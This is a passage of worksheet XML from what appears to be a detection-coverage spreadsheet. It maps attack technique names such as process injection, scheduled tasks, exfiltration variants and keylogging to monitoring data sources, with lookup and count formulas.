    <row r="54" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A54" s="55" t="s">
        <v>103</v>
      </c>
      <c r="B54" s="17" t="str">
        <f>LOOKUP(A54,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring</v>
      </c>
      <c r="C54" s="17" t="s">
        <v>104</v>
      </c>
      <c r="D54" s="17">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E54" s="17">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="F54" s="13"/>
      <c r="G54" s="53" t="str">
        <f>VLOOKUP(A54,'REF-DataSources'!A:B,2)</f>
        <v>Boot or Logon Initialization Scripts</v>
      </c>
    </row>
    <row r="55" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A55" s="55" t="s">
        <v>784</v>
      </c>
      <c r="B55" s="17" t="str">
        <f>LOOKUP(A55,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Windows Registry</v>
      </c>
      <c r="C55" s="17" t="s">
        <v>104</v>
      </c>
      <c r="D55" s="17">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E55" s="17">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="F55" s="13"/>
      <c r="G55" s="53" t="str">
        <f>VLOOKUP(A55,'REF-DataSources'!A:B,2)</f>
        <v>Logon Script (Windows)</v>
      </c>
    </row>
    <row r="56" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A56" s="55" t="s">
        <v>789</v>
      </c>
      <c r="B56" s="17" t="str">
        <f>LOOKUP(A56,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring</v>
      </c>
      <c r="C56" s="17" t="s">
        <v>104</v>
      </c>
      <c r="D56" s="17">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E56" s="17">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="F56" s="13"/>
      <c r="G56" s="53" t="str">
        <f>VLOOKUP(A56,'REF-DataSources'!A:B,2)</f>
        <v>Logon Script (Mac)</v>
      </c>
    </row>
    <row r="57" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A57" s="55" t="s">
        <v>794</v>
      </c>
      <c r="B57" s="17" t="str">
        <f>LOOKUP(A57,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring</v>
      </c>
      <c r="C57" s="17" t="s">
        <v>104</v>
      </c>
      <c r="D57" s="17">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E57" s="17">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="F57" s="13"/>
      <c r="G57" s="53" t="str">
        <f>VLOOKUP(A57,'REF-DataSources'!A:B,2)</f>
        <v>Network Logon Script</v>
      </c>
    </row>
    <row r="58" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A58" s="55" t="s">
        <v>797</v>
      </c>
      <c r="B58" s="17" t="str">
        <f>LOOKUP(A58,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring</v>
      </c>
      <c r="C58" s="17" t="s">
        <v>104</v>
      </c>
      <c r="D58" s="17">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E58" s="17">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="F58" s="13"/>
      <c r="G58" s="53" t="str">
        <f>VLOOKUP(A58,'REF-DataSources'!A:B,2)</f>
        <v>Rc.common</v>
      </c>
    </row>
    <row r="59" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A59" s="55" t="s">
        <v>801</v>
      </c>
      <c r="B59" s="17" t="str">
        <f>LOOKUP(A59,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring</v>
      </c>
      <c r="C59" s="17" t="s">
        <v>104</v>
      </c>
      <c r="D59" s="17">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E59" s="17">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="F59" s="13"/>
      <c r="G59" s="53" t="str">
        <f>VLOOKUP(A59,'REF-DataSources'!A:B,2)</f>
        <v>Startup Items</v>
      </c>
    </row>
    <row r="60" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A60" s="55" t="s">
        <v>106</v>
      </c>
      <c r="B60" s="17" t="str">
        <f>LOOKUP(A60,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C60" s="17" t="s">
        <v>107</v>
      </c>
      <c r="D60" s="17">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E60" s="17">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F60" s="13"/>
      <c r="G60" s="53" t="str">
        <f>VLOOKUP(A60,'REF-DataSources'!A:B,2)</f>
        <v>Data from Network Shared Drive</v>
      </c>
    </row>
    <row r="61" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A61" s="55" t="s">
        <v>108</v>
      </c>
      <c r="B61" s="17" t="str">
        <f>LOOKUP(A61,'REF-DataSources'!A:C)</f>
        <v>Network device logs,Host network interface,Netflow/Enclave netflow,Process monitoring</v>
      </c>
      <c r="C61" s="17" t="s">
        <v>109</v>
      </c>
      <c r="D61" s="17">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E61" s="17">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="F61" s="13"/>
      <c r="G61" s="53" t="str">
        <f>VLOOKUP(A61,'REF-DataSources'!A:B,2)</f>
        <v>Network Sniffing</v>
      </c>
    </row>
    <row r="62" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A62" s="55" t="s">
        <v>110</v>
      </c>
      <c r="B62" s="17" t="str">
        <f>LOOKUP(A62,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Process use of network,Netflow/Enclave netflow,Process monitoring</v>
      </c>
      <c r="C62" s="17" t="s">
        <v>3106</v>
      </c>
      <c r="D62" s="17">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E62" s="17">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="F62" s="13"/>
      <c r="G62" s="53" t="str">
        <f>VLOOKUP(A62,'REF-DataSources'!A:B,2)</f>
        <v>Exfiltration Over C2 Channel</v>
      </c>
    </row>
    <row r="63" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A63" s="55" t="s">
        <v>113</v>
      </c>
      <c r="B63" s="17" t="str">
        <f>LOOKUP(A63,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Netflow/Enclave netflow,Process use of network,Process monitoring</v>
      </c>
      <c r="C63" s="17" t="s">
        <v>114</v>
      </c>
      <c r="D63" s="17">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E63" s="17">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="F63" s="13"/>
      <c r="G63" s="53" t="str">
        <f>VLOOKUP(A63,'REF-DataSources'!A:B,2)</f>
        <v>Commonly Used Port</v>
      </c>
    </row>
    <row r="64" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A64" s="55" t="s">
        <v>117</v>
      </c>
      <c r="B64" s="17" t="str">
        <f>LOOKUP(A64,'REF-DataSources'!A:C)</f>
        <v>Netflow/Enclave netflow,Network protocol analysis,Packet capture,Process command-line parameters,Process use of network</v>
      </c>
      <c r="C64" s="17" t="s">
        <v>67</v>
      </c>
      <c r="D64" s="17">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
      <c r="E64" s="17">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="F64" s="13"/>
      <c r="G64" s="53" t="str">
        <f>VLOOKUP(A64,'REF-DataSources'!A:B,2)</f>
        <v>Network Service Scanning</v>
      </c>
    </row>
    <row r="65" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A65" s="55" t="s">
        <v>118</v>
      </c>
      <c r="B65" s="17" t="str">
        <f>LOOKUP(A65,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,Netflow/Enclave netflow,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C65" s="17" t="s">
        <v>95</v>
      </c>
      <c r="D65" s="17">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E65" s="17">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="F65" s="13"/>
      <c r="G65" s="53" t="str">
        <f>VLOOKUP(A65,'REF-DataSources'!A:B,2)</f>
        <v>Windows Management Instrumentation</v>
      </c>
    </row>
    <row r="66" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A66" s="55" t="s">
        <v>119</v>
      </c>
      <c r="B66" s="17" t="str">
        <f>LOOKUP(A66,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process use of network,Packet capture,Netflow/Enclave netflow,Network protocol analysis</v>
      </c>
      <c r="C66" s="17" t="s">
        <v>67</v>
      </c>
      <c r="D66" s="17">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
      <c r="E66" s="17">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="F66" s="13"/>
      <c r="G66" s="53" t="str">
        <f>VLOOKUP(A66,'REF-DataSources'!A:B,2)</f>
        <v>Exfiltration Over Alternative Protocol</v>
      </c>
    </row>
    <row r="67" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A67" s="55" t="s">
        <v>831</v>
      </c>
      <c r="B67" s="17" t="str">
        <f>LOOKUP(A67,'REF-DataSources'!A:C)</f>
        <v>Malware reverse engineering,Network protocol analysis,Netflow/Enclave netflow,Packet capture,Process use of network</v>
      </c>
      <c r="C67" s="17" t="s">
        <v>67</v>
      </c>
      <c r="D67" s="17">
        <f t="shared" ref="D67:D130" si="3">LEN(TRIM(B67))-LEN(SUBSTITUTE(TRIM(B67),",",""))+1</f>
        <v>5</v>
      </c>
      <c r="E67" s="17">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="F67" s="13"/>
      <c r="G67" s="53" t="str">
        <f>VLOOKUP(A67,'REF-DataSources'!A:B,2)</f>
        <v>Exfiltration Over Symmetric Encrypted Non-C2 Protocol</v>
      </c>
    </row>
    <row r="68" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A68" s="55" t="s">
        <v>836</v>
      </c>
      <c r="B68" s="17" t="str">
        <f>LOOKUP(A68,'REF-DataSources'!A:C)</f>
        <v>Network protocol analysis,Netflow/Enclave netflow,Packet capture,Process use of network</v>
      </c>
      <c r="C68" s="17" t="s">
        <v>3106</v>
      </c>
      <c r="D68" s="17">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="E68" s="17">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="F68" s="13"/>
      <c r="G68" s="53" t="str">
        <f>VLOOKUP(A68,'REF-DataSources'!A:B,2)</f>
        <v>Exfiltration Over Asymmetric Encrypted Non-C2 Protocol</v>
      </c>
    </row>
    <row r="69" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A69" s="55" t="s">
        <v>841</v>
      </c>
      <c r="B69" s="17" t="str">
        <f>LOOKUP(A69,'REF-DataSources'!A:C)</f>
        <v>Network protocol analysis,Netflow/Enclave netflow,Packet capture,Process use of network</v>
      </c>
      <c r="C69" s="17" t="s">
        <v>3106</v>
      </c>
      <c r="D69" s="17">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="E69" s="17">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="F69" s="13"/>
      <c r="G69" s="53" t="str">
        <f>VLOOKUP(A69,'REF-DataSources'!A:B,2)</f>
        <v>Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol</v>
      </c>
    </row>
    <row r="70" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A70" s="55" t="s">
        <v>121</v>
      </c>
      <c r="B70" s="17" t="str">
        <f>LOOKUP(A70,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C70" s="17" t="s">
        <v>122</v>
      </c>
      <c r="D70" s="17">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="E70" s="17">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="F70" s="13"/>
      <c r="G70" s="53" t="str">
        <f>VLOOKUP(A70,'REF-DataSources'!A:B,2)</f>
        <v>System Network Connections Discovery</v>
      </c>
    </row>
    <row r="71" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A71" s="55" t="s">
        <v>124</v>
      </c>
      <c r="B71" s="17" t="str">
        <f>LOOKUP(A71,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring</v>
      </c>
      <c r="C71" s="17" t="s">
        <v>63</v>
      </c>
      <c r="D71" s="17">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="E71" s="17">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="F71" s="13"/>
      <c r="G71" s="53" t="str">
        <f>VLOOKUP(A71,'REF-DataSources'!A:B,2)</f>
        <v>Shared Webroot</v>
      </c>
    </row>
    <row r="72" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A72" s="55" t="s">
        <v>125</v>
      </c>
      <c r="B72" s="17" t="str">
        <f>LOOKUP(A72,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Data loss prevention,File monitoring</v>
      </c>
      <c r="C72" s="17" t="s">
        <v>52</v>
      </c>
      <c r="D72" s="17">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E72" s="17">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F72" s="13"/>
      <c r="G72" s="53" t="str">
        <f>VLOOKUP(A72,'REF-DataSources'!A:B,2)</f>
        <v>Exfiltration Over Physical Medium</v>
      </c>
    </row>
    <row r="73" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A73" s="55" t="s">
        <v>855</v>
      </c>
      <c r="B73" s="17" t="str">
        <f>LOOKUP(A73,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Data loss prevention,File monitoring</v>
      </c>
      <c r="C73" s="17" t="s">
        <v>52</v>
      </c>
      <c r="D73" s="17">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E73" s="17">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F73" s="13"/>
      <c r="G73" s="53" t="str">
        <f>VLOOKUP(A73,'REF-DataSources'!A:B,2)</f>
        <v>Exfiltration over USB</v>
      </c>
    </row>
    <row r="74" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A74" s="55" t="s">
        <v>127</v>
      </c>
      <c r="B74" s="17" t="str">
        <f>LOOKUP(A74,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters,Windows event logs</v>
      </c>
      <c r="C74" s="17" t="s">
        <v>128</v>
      </c>
      <c r="D74" s="17">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="E74" s="17">
        <f t="shared" ref="E74:E137" si="4">LEN(TRIM(C74))-LEN(SUBSTITUTE(TRIM(C74),";",""))+1</f>
        <v>4</v>
      </c>
      <c r="F74" s="13"/>
      <c r="G74" s="53" t="str">
        <f>VLOOKUP(A74,'REF-DataSources'!A:B,2)</f>
        <v>Scheduled Task/Job</v>
      </c>
    </row>
    <row r="75" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A75" s="55" t="s">
        <v>863</v>
      </c>
      <c r="B75" s="17" t="str">
        <f>LOOKUP(A75,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C75" s="17" t="s">
        <v>140</v>
      </c>
      <c r="D75" s="17">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="E75" s="17">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="F75" s="13"/>
      <c r="G75" s="53" t="str">
        <f>VLOOKUP(A75,'REF-DataSources'!A:B,2)</f>
        <v>At (Linux)</v>
      </c>
    </row>
    <row r="76" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A76" s="55" t="s">
        <v>868</v>
      </c>
      <c r="B76" s="17" t="str">
        <f>LOOKUP(A76,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process command-line parameters,Process monitoring,Windows event logs</v>
      </c>
      <c r="C76" s="17" t="s">
        <v>128</v>
      </c>
      <c r="D76" s="17">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="E76" s="17">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F76" s="13"/>
      <c r="G76" s="53" t="str">
        <f>VLOOKUP(A76,'REF-DataSources'!A:B,2)</f>
        <v>At (Windows)</v>
      </c>
    </row>
    <row r="77" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A77" s="55" t="s">
        <v>873</v>
      </c>
      <c r="B77" s="17" t="str">
        <f>LOOKUP(A77,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C77" s="17" t="s">
        <v>140</v>
      </c>
      <c r="D77" s="17">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="E77" s="17">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="F77" s="13"/>
      <c r="G77" s="53" t="str">
        <f>VLOOKUP(A77,'REF-DataSources'!A:B,2)</f>
        <v>Cron</v>
      </c>
    </row>
    <row r="78" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A78" s="55" t="s">
        <v>877</v>
      </c>
      <c r="B78" s="17" t="str">
        <f>LOOKUP(A78,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,File monitoring,Process monitoring</v>
      </c>
      <c r="C78" s="17" t="s">
        <v>140</v>
      </c>
      <c r="D78" s="17">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E78" s="17">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="F78" s="13"/>
      <c r="G78" s="53" t="str">
        <f>VLOOKUP(A78,'REF-DataSources'!A:B,2)</f>
        <v>Launchd</v>
      </c>
    </row>
    <row r="79" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A79" s="55" t="s">
        <v>881</v>
      </c>
      <c r="B79" s="17" t="str">
        <f>LOOKUP(A79,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process command-line parameters,Process monitoring,Windows event logs</v>
      </c>
      <c r="C79" s="17" t="s">
        <v>3100</v>
      </c>
      <c r="D79" s="17">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="E79" s="17">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F79" s="13"/>
      <c r="G79" s="53" t="str">
        <f>VLOOKUP(A79,'REF-DataSources'!A:B,2)</f>
        <v>Scheduled Task</v>
      </c>
    </row>
    <row r="80" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A80" s="55" t="s">
        <v>885</v>
      </c>
      <c r="B80" s="17" t="str">
        <f>LOOKUP(A80,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C80" s="17" t="s">
        <v>52</v>
      </c>
      <c r="D80" s="17">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E80" s="17">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F80" s="13"/>
      <c r="G80" s="53" t="str">
        <f>VLOOKUP(A80,'REF-DataSources'!A:B,2)</f>
        <v>Systemd Timers</v>
      </c>
    </row>
    <row r="81" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A81" s="55" t="s">
        <v>131</v>
      </c>
      <c r="B81" s="17" t="str">
        <f>LOOKUP(A81,'REF-DataSources'!A:C)</f>
        <v>API monitoring,File monitoring,DLL monitoring,Process monitoring,Named Pipes</v>
      </c>
      <c r="C81" s="17" t="s">
        <v>67</v>
      </c>
      <c r="D81" s="17">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
      <c r="E81" s="17">
        <f t="shared" si="4"/>
        <v>5</v>
      </c>
      <c r="F81" s="13"/>
      <c r="G81" s="53" t="str">
        <f>VLOOKUP(A81,'REF-DataSources'!A:B,2)</f>
        <v>Process Injection</v>
      </c>
    </row>
    <row r="82" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A82" s="55" t="s">
        <v>895</v>
      </c>
      <c r="B82" s="17" t="str">
        <f>LOOKUP(A82,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,DLL monitoring,File monitoring,API monitoring</v>
      </c>
      <c r="C82" s="17" t="s">
        <v>45</v>
      </c>
      <c r="D82" s="17">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="E82" s="17">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F82" s="13"/>
      <c r="G82" s="53" t="str">
        <f>VLOOKUP(A82,'REF-DataSources'!A:B,2)</f>
        <v>Dynamic-link Library Injection</v>
      </c>
    </row>
    <row r="83" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A83" s="55" t="s">
        <v>900</v>
      </c>
      <c r="B83" s="17" t="str">
        <f>LOOKUP(A83,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,API monitoring</v>
      </c>
      <c r="C83" s="17" t="s">
        <v>55</v>
      </c>
      <c r="D83" s="17">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="E83" s="17">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="F83" s="13"/>
      <c r="G83" s="53" t="str">
        <f>VLOOKUP(A83,'REF-DataSources'!A:B,2)</f>
        <v>Portable Executable Injection</v>
      </c>
    </row>
    <row r="84" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A84" s="55" t="s">
        <v>906</v>
      </c>
      <c r="B84" s="17" t="str">
        <f>LOOKUP(A84,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,API monitoring</v>
      </c>
      <c r="C84" s="17" t="s">
        <v>55</v>
      </c>
      <c r="D84" s="17">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="E84" s="17">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="F84" s="13"/>
      <c r="G84" s="53" t="str">
        <f>VLOOKUP(A84,'REF-DataSources'!A:B,2)</f>
        <v>Thread Execution Hijacking</v>
      </c>
    </row>
    <row r="85" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A85" s="55" t="s">
        <v>910</v>
      </c>
      <c r="B85" s="17" t="str">
        <f>LOOKUP(A85,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,API monitoring</v>
      </c>
      <c r="C85" s="17" t="s">
        <v>132</v>
      </c>
      <c r="D85" s="17">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="E85" s="17">
        <f t="shared" si="4"/>
        <v>6</v>
      </c>
      <c r="F85" s="13"/>
      <c r="G85" s="53" t="str">
        <f>VLOOKUP(A85,'REF-DataSources'!A:B,2)</f>
        <v>Asynchronous Procedure Call</v>
      </c>
    </row>
    <row r="86" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A86" s="55" t="s">
        <v>914</v>
      </c>
      <c r="B86" s="17" t="str">
        <f>LOOKUP(A86,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,API monitoring</v>
      </c>
      <c r="C86" s="17" t="s">
        <v>55</v>
      </c>
      <c r="D86" s="17">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="E86" s="17">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="F86" s="13"/>
      <c r="G86" s="53" t="str">
        <f>VLOOKUP(A86,'REF-DataSources'!A:B,2)</f>
        <v>Thread Local Storage</v>
      </c>
    </row>
    <row r="87" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A87" s="55" t="s">
        <v>917</v>
      </c>
      <c r="B87" s="17" t="str">
        <f>LOOKUP(A87,'REF-DataSources'!A:C)</f>
        <v>System calls,Process monitoring</v>
      </c>
      <c r="C87" s="17" t="s">
        <v>126</v>
      </c>
      <c r="D87" s="17">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="E87" s="17">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="F87" s="13"/>
      <c r="G87" s="53" t="str">
        <f>VLOOKUP(A87,'REF-DataSources'!A:B,2)</f>
        <v>Ptrace System Calls</v>
      </c>
    </row>
    <row r="88" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A88" s="55" t="s">
        <v>922</v>
      </c>
      <c r="B88" s="17" t="str">
        <f>LOOKUP(A88,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring</v>
      </c>
      <c r="C88" s="17" t="s">
        <v>132</v>
      </c>
      <c r="D88" s="17">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="E88" s="17">
        <f t="shared" si="4"/>
        <v>6</v>
      </c>
      <c r="F88" s="13"/>
      <c r="G88" s="53" t="str">
        <f>VLOOKUP(A88,'REF-DataSources'!A:B,2)</f>
        <v>Proc Memory</v>
      </c>
    </row>
    <row r="89" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A89" s="55" t="s">
        <v>926</v>
      </c>
      <c r="B89" s="17" t="str">
        <f>LOOKUP(A89,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,API monitoring</v>
      </c>
      <c r="C89" s="17" t="s">
        <v>55</v>
      </c>
      <c r="D89" s="17">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="E89" s="17">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="F89" s="13"/>
      <c r="G89" s="53" t="str">
        <f>VLOOKUP(A89,'REF-DataSources'!A:B,2)</f>
        <v>Extra Window Memory Injection</v>
      </c>
    </row>
    <row r="90" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A90" s="55" t="s">
        <v>930</v>
      </c>
      <c r="B90" s="17" t="str">
        <f>LOOKUP(A90,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,API monitoring</v>
      </c>
      <c r="C90" s="17" t="s">
        <v>55</v>
      </c>
      <c r="D90" s="17">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="E90" s="17">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="F90" s="13"/>
      <c r="G90" s="53" t="str">
        <f>VLOOKUP(A90,'REF-DataSources'!A:B,2)</f>
        <v>Process Hollowing</v>
      </c>
    </row>
    <row r="91" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A91" s="55" t="s">
        <v>933</v>
      </c>
      <c r="B91" s="17" t="str">
        <f>LOOKUP(A91,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,API monitoring</v>
      </c>
      <c r="C91" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D91" s="17">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E91" s="17">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F91" s="13"/>
      <c r="G91" s="53" t="str">
        <f>VLOOKUP(A91,'REF-DataSources'!A:B,2)</f>
        <v>Process Doppelgänging</v>
      </c>
    </row>
    <row r="92" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A92" s="55" t="s">
        <v>938</v>
      </c>
      <c r="B92" s="17" t="str">
        <f>LOOKUP(A92,'REF-DataSources'!A:C)</f>
        <v>System calls,Process monitoring</v>
      </c>
      <c r="C92" s="17" t="s">
        <v>126</v>
      </c>
      <c r="D92" s="17">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="E92" s="17">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="F92" s="13"/>
      <c r="G92" s="53" t="str">
        <f>VLOOKUP(A92,'REF-DataSources'!A:B,2)</f>
        <v>VDSO Hijacking</v>
      </c>
    </row>
    <row r="93" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A93" s="55" t="s">
        <v>133</v>
      </c>
      <c r="B93" s="17" t="str">
        <f>LOOKUP(A93,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,Windows event logs,User interface,Process command-line parameters,Process monitoring,PowerShell logs,Loaded DLLs,Kernel drivers,DLL monitoring,Binary file metadata,API monitoring</v>
      </c>
      <c r="C93" s="17" t="s">
        <v>3107</v>
      </c>
      <c r="D93" s="17">
        <f t="shared" si="3"/>
        <v>11</v>
      </c>
      <c r="E93" s="17">
        <f t="shared" si="4"/>
        <v>11</v>
      </c>
      <c r="F93" s="13"/>
      <c r="G93" s="53" t="str">
        <f>VLOOKUP(A93,'REF-DataSources'!A:B,2)</f>
        <v>Input Capture</v>
      </c>
    </row>
    <row r="94" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A94" s="55" t="s">
        <v>947</v>
      </c>
      <c r="B94" s="17" t="str">
        <f>LOOKUP(A94,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,Process monitoring,API monitoring</v>
      </c>
      <c r="C94" s="17" t="s">
        <v>99</v>
      </c>
      <c r="D94" s="17">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E94" s="17">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F94" s="13"/>
      <c r="G94" s="53" t="str">
        <f>VLOOKUP(A94,'REF-DataSources'!A:B,2)</f>
        <v>Keylogging</v>
      </c>
    </row>
    <row r="95" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A95" s="55" t="s">
        <v>953</v>
      </c>
